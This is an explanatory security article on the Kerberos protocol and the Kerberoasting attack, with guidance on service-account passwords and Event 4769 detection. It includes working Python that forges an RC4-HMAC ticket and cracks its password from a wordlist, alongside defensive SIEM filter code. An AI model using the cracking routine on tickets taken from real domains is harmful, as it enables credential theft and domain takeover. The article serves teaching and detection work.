Kerberos Protocol
Kerberos is a network authentication protocol designed to let clients and services prove their identities to each other over an untrusted network without ever sending the password itself across it. It relies on symmetric (shared-secret) cryptography: every principal shares a long-term key with the Key Distribution Center, and the messages that matter are encrypted or integrity-protected with keys derived from those secrets.
Key Distribution Center:
The Key Distribution Center is the service at the heart of the protocol. It holds the long-term keys of every principal (users, computers and service accounts) and issues tickets: short-lived, encrypted tokens that let two parties agree on a fresh session key and communicate securely without the KDC being involved in the rest of the conversation. In an Active Directory domain the KDC runs on every domain controller, and a client must obtain a ticket from it before it can authenticate to any service.
Authentication Service (AS):
Part of the Key Distribution Center (KDC), responsible for the first step of authentication. When a user logs on, the AS checks that the account exists in the Active Directory domain and that the client knows the account's password (the pre-authentication data must decrypt under the key derived from that password). If both checks pass, it issues a Ticket Granting Ticket (TGT).
KRBTGT:
- The built-in account whose key the KDC uses to encrypt and sign Ticket Granting Tickets. It is created automatically with the domain, cannot be renamed or deleted, and is disabled by default. Because its key protects every TGT, compromise of the KRBTGT key is compromise of the whole domain.
Ticket Granting Service (TGS):
- The other half of the KDC. A user who already holds a valid TGT presents it to the TGS to obtain a service ticket for a specific service, identified by its Service Principal Name (SPN). The service ticket is encrypted with the long-term key of the account that owns that SPN, which is exactly what Kerberoasting exploits.
What is Kerberoasting?
Kerberoasting is an attack technique for recovering the passwords of service accounts, that is, domain accounts with a registered SPN. Any authenticated domain user may request a service ticket for any SPN; because that ticket is encrypted with a key derived from the service account's password, the attacker can take it offline and guess the password without any further contact with the domain controller. It is used to move laterally, to escalate privileges (service accounts are often over-privileged) and to establish persistence. Once the service account's key is known, the attacker is not limited to logging in with the password: they can also forge service tickets for that service with arbitrary user and group information in them (a "silver ticket").
How do Kerberoasting attacks work?
In Kerberoasting attacks the attacker relies on weak or guessable service account passwords; nothing in the ticket request itself is an error or an exploit, it is ordinary Kerberos traffic. The sequence is as follows:
- The attacker first authenticates as a domain user account they already control (any low-privileged account will do) and obtains a TGT.
- The attacker enumerates accounts with SPNs in Active Directory (an LDAP query on servicePrincipalName) and requests a service ticket from the TGS for each of them, typically asking for the RC4 encryption type (etype 23, logged as 0x17), because an RC4 key is simply the NT hash of the password and cracks far faster than an AES key.
- The KDC returns a service ticket for each SPN. The ticket does not contain the password: its encrypted part is encrypted with the service account's long-term key, which is derived from the password.
- The attacker extracts the tickets from memory or from the tool's output in hashcat or John format and takes them offline.
- Offline, the attacker derives a key from each candidate password and checks whether it decrypts the ticket correctly (Hashcat mode 13100, or John's krb5tgs format). No further traffic to the domain controller is needed, so the guessing produces no failed logon events.
- With the recovered password the attacker logs in as the service account and gains whatever access that account has on the network.
- Finally, the attacker can read the data the compromised account can reach, escalate privileges further and plant backdoors on the network to facilitate later access.
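The offline step above is the whole point of the attack, so here it is carried through in code. This is an added example, not code from the original article or from any Kerberoasting tool: it builds the RC4-HMAC (etype 23) encryption of a service ticket the way the KDC does per RFC 4757, emits the ticket in the hashcat 13100 line format, and then recovers the service account password from a wordlist by re-deriving the key from each guess and checking the ticket's checksum. The account, SPN, realm, password, wordlist and the plaintext standing in for the ticket's EncTicketPart are all constructed for the demonstration; a real enc-part is DER-encoded ASN.1, which does not change the cracking logic. MD4 is implemented inline because hashlib's MD4 is usually disabled under OpenSSL 3.

```python
import hashlib
import hmac
import os
import struct

MASK32 = 0xFFFFFFFF
KEY_USAGE_TGS_TICKET = 2  # RFC 4120 key usage for the service ticket's encrypted part


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320): hashlib's md4 is usually disabled under OpenSSL 3."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK32
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (8 * len(data)) & 0xFFFFFFFFFFFFFFFF)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (F, list(range(16)), (3, 7, 11, 19), 0),
        (G, [(i % 4) * 4 + i // 4 for i in range(16)], (3, 5, 9, 13), 0x5A827999),
        (H, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15), 0x6ED9EBA1),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        v = state[:]
        for f, order, shifts, k in rounds:
            for i in range(16):
                t = -i % 4  # the register being updated rotates a, d, c, b
                x, y, z = v[(1 - i) % 4], v[(2 - i) % 4], v[(3 - i) % 4]
                v[t] = rotl((v[t] + f(x, y, z) + X[order[i]] + k) & MASK32, shifts[i % 4])
        state = [(s + w) & MASK32 for s, w in zip(state, v)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """The RC4-HMAC Kerberos key is the NT hash: MD4 of the UTF-16LE password (RFC 4757)."""
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def rc4_hmac_encrypt(key: bytes, usage: int, plaintext: bytes, confounder: bytes = None) -> bytes:
    """RFC 4757 encryption as the KDC applies it: checksum(16) || RC4(K3, confounder || plaintext)."""
    data = (confounder or os.urandom(8)) + plaintext
    k1 = hmac.new(key, struct.pack("<I", usage), hashlib.md5).digest()
    checksum = hmac.new(k1, data, hashlib.md5).digest()  # K2 == K1 for non-export keys
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    return checksum + rc4(k3, data)


def to_hashcat_13100(user: str, realm: str, spn: str, enc_part: bytes) -> str:
    """Hashcat mode 13100 line: $krb5tgs$23$*user$realm$spn*$checksum$edata2."""
    return f"$krb5tgs$23$*{user}${realm}${spn}*${enc_part[:16].hex()}${enc_part[16:].hex()}"


def crack_tgs_rc4(hashline: str, wordlist):
    """Offline guess: a candidate is right iff its key re-derives a checksum that verifies."""
    checksum, edata2 = (bytes.fromhex(h) for h in hashline.rsplit("$", 2)[1:])
    usage = struct.pack("<I", KEY_USAGE_TGS_TICKET)
    for candidate in wordlist:
        k1 = hmac.new(nt_hash(candidate), usage, hashlib.md5).digest()
        k3 = hmac.new(k1, checksum, hashlib.md5).digest()
        plain = rc4(k3, edata2)
        if hmac.compare_digest(hmac.new(k1, plain, hashlib.md5).digest(), checksum):
            return candidate
    return None


def demo():
    # Constructed sample, not real data: a service account with a guessable password.
    user, realm, spn = "svc_sql", "CORP.LOCAL", "MSSQLSvc/sql01.corp.local:1433"
    service_password = "Summer2019!"
    # A real enc-part is a DER EncTicketPart (session key, client name, PAC); a stand-in here.
    enc_ticket_part = b"EncTicketPart{session-key, cname=bob@CORP.LOCAL, PAC}"
    ticket_blob = rc4_hmac_encrypt(nt_hash(service_password), KEY_USAGE_TGS_TICKET, enc_ticket_part)
    line = to_hashcat_13100(user, realm, spn, ticket_blob)
    wordlist = ["Password1", "Welcome123", "Summer2019!", "P@ssw0rd"]
    return line, crack_tgs_rc4(line, wordlist)


if __name__ == "__main__":
    line, found = demo()
    print(line)
    print("recovered:", found)
```

Two things the code makes concrete: the key is nothing more than MD4 of the password, so every guess costs one MD4 plus three HMAC-MD5 and one RC4, which is why RC4 tickets crack orders of magnitude faster than AES ones; and every guess is verified locally against the checksum, so the domain controller never sees a failed attempt.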
How to Detect and Stop Kerberoasting Attacks
Several measures reduce the effectiveness of Kerberoasting. The main ones are:
Powerful Password Management:
As with any password-cracking attack, the cost of Kerberoasting is set by the strength of the service account password, because the ticket is only as strong as the key derived from it. For service accounts:
– The password should be at least 25 characters.
– It should not be a recognizable word or phrase, and should mix uppercase and lowercase letters, numbers and symbols.
– It should be rotated regularly, for instance every 30 days. Group Managed Service Accounts (gMSA) rotate long random passwords automatically and are the preferred option wherever the service supports them.
These rules matter most for accounts that have SPNs, since those are exactly the accounts whose tickets any domain user can request.
MFA Usage:
Multi-Factor Authentication is another layer. It does not stop the ticket request or the offline cracking (any authenticated user can request service tickets, and the guessing happens off the network), but it limits what a recovered password is worth by blocking interactive and remote logon with the password alone.
Kerberos Event Log Configuration:
This is the most important piece of the detection side. Kerberoasting tools request service tickets with the RC4 encryption type (0x17), because RC4 keys are derived directly from the NT hash and crack far faster than AES keys, and the domain controllers must be configured to log successful service ticket requests so that those requests can be seen at all.
To do this, enable "Audit Kerberos Service Ticket Operations" under Account Logon in the domain controllers' advanced audit policy. Service ticket transactions are then recorded in the Security Event Log under the following Event IDs:
– 4769: A Kerberos service ticket (TGS) was requested
– 4770: A Kerberos service ticket was renewed
Event ID 4769 is the one that matters for Kerberoasting; 4770 is renewal traffic and is not produced by the attack.
Detection:
A SIEM or EDR product is used to detect such attacks by filtering the 4769 events down to the ones that look like Kerberoasting. The filters are:
1- Event ID is 4769: only service ticket requests.
2- Service Name is not 'krbtgt': excludes TGT requests and renewals, which also produce 4769 events with krbtgt as the service name.
3- Service Name does not end with '$': excludes tickets for computer accounts; Kerberoasting targets user accounts with SPNs, whose names have no trailing '$'.
4- Account Name does not contain '$@': excludes requests made by computer accounts (their names look like HOST01$@CORP.LOCAL), which is normal machine traffic.
5- Failure Code is '0x0': only successful requests, since the attacker actually receives a ticket.
6- Ticket Encryption Type is '0x17': RC4-HMAC, the encryption type Kerberoasting tools request.
Using these filters we can build a search query in a SIEM or event aggregator to see who is requesting SPN tickets. The query below is written for the ELK Stack (Elasticsearch, Logstash, Kibana) and translates directly to Splunk or any other query language. A single matching event is not proof of an attack, since legacy applications still request RC4 tickets; what stands out is one account requesting tickets for many different SPNs within a short time.
Filtering for ELK:
1- event_id “is” 4769
2- Status “is” 0x0
3- Ticket_Encryption_Type “is” 0x17
4- Service_Name “is not” krbtgt
5- Service_Name “does not end with” $
6- Account_Name “does not contain” $@
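The six filters above, together with the "many SPNs from one account in a short window" heuristic, as an added example that is not part of the original article or of any SIEM product. It runs the filters over a constructed batch of parsed 4769 events (fictitious accounts, services and timestamps, the field names chosen for this example rather than taken from any log schema) and then groups the survivors per requesting account to find a burst across distinct service names, which is the shape a Kerberoasting sweep leaves in the log.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not real logs): the fields a SIEM parses out of
# Security events 4769/4770. Field names are this example's, not a log schema.
FIELDS = ("event_id", "time", "account", "service", "etype", "status")
SAMPLE_EVENTS = [dict(zip(FIELDS, row)) for row in [
    (4769, "2024-03-01T09:00:01", "jdoe@CORP.LOCAL",  "krbtgt",     "0x12", "0x0"),   # TGT, filtered by rule 2
    (4769, "2024-03-01T09:00:02", "jdoe@CORP.LOCAL",  "FS01$",      "0x12", "0x0"),   # computer account service
    (4769, "2024-03-01T09:00:03", "WS07$@CORP.LOCAL", "svc_sql",    "0x17", "0x0"),   # computer account requester
    (4770, "2024-03-01T09:00:04", "jdoe@CORP.LOCAL",  "svc_sql",    "0x17", "0x0"),   # renewal, not a request
    (4769, "2024-03-01T09:05:00", "jdoe@CORP.LOCAL",  "svc_sql",    "0x12", "0x0"),   # AES, normal use
    (4769, "2024-03-01T10:15:00", "app01@CORP.LOCAL", "svc_legacy", "0x17", "0x0"),   # lone RC4: legacy noise
    (4769, "2024-03-01T11:30:00", "bob@CORP.LOCAL",   "svc_sql",    "0x17", "0x0"),   # start of a sweep
    (4769, "2024-03-01T11:30:00", "bob@CORP.LOCAL",   "svc_iis",    "0x17", "0x0"),
    (4769, "2024-03-01T11:30:01", "bob@CORP.LOCAL",   "svc_backup", "0x17", "0x0"),
    (4769, "2024-03-01T11:30:01", "bob@CORP.LOCAL",   "svc_sccm",   "0x17", "0x0"),
    (4769, "2024-03-01T11:30:02", "bob@CORP.LOCAL",   "svc_mon",    "0x17", "0x0"),
    (4769, "2024-03-01T11:30:02", "bob@CORP.LOCAL",   "svc_old",    "0x17", "0x1F"),  # failed, filtered by rule 5
]]


def is_roast_candidate(ev):
    """The six filters from the text, applied to one parsed event."""
    return (ev["event_id"] == 4769
            and ev["service"].lower() != "krbtgt"
            and not ev["service"].endswith("$")
            and "$@" not in ev["account"]
            and ev["status"] == "0x0"
            and ev["etype"] == "0x17")


def roast_candidates(events):
    return [ev for ev in events if is_roast_candidate(ev)]


def burst_requesters(events, window=timedelta(minutes=5), min_spns=4):
    """Accounts that obtained RC4 tickets for at least min_spns distinct services
    inside one window. A lone RC4 request is routine for legacy software; a burst
    across many SPNs from one account is what a Kerberoasting sweep looks like."""
    by_account = defaultdict(list)
    for ev in roast_candidates(events):
        by_account[ev["account"]].append((datetime.fromisoformat(ev["time"]), ev["service"]))
    alerts = {}
    for account, reqs in by_account.items():
        reqs.sort()
        best = set()
        for i, (t0, _) in enumerate(reqs):  # slide the window from each request
            spns = {spn for t, spn in reqs[i:] if t - t0 <= window}
            if len(spns) > len(best):
                best = spns
        if len(best) >= min_spns:
            alerts[account] = sorted(best)
    return alerts


if __name__ == "__main__":
    for account, spns in burst_requesters(SAMPLE_EVENTS).items():
        print(f"ALERT possible Kerberoasting by {account}: {', '.join(spns)}")
```

The threshold and window are tuning knobs: start with a high threshold to learn which service accounts and legacy hosts generate RC4 requests legitimately, then lower it. Any account that appears in the burst list should be checked against the SPN accounts it touched, because each of those tickets is now crackable offline.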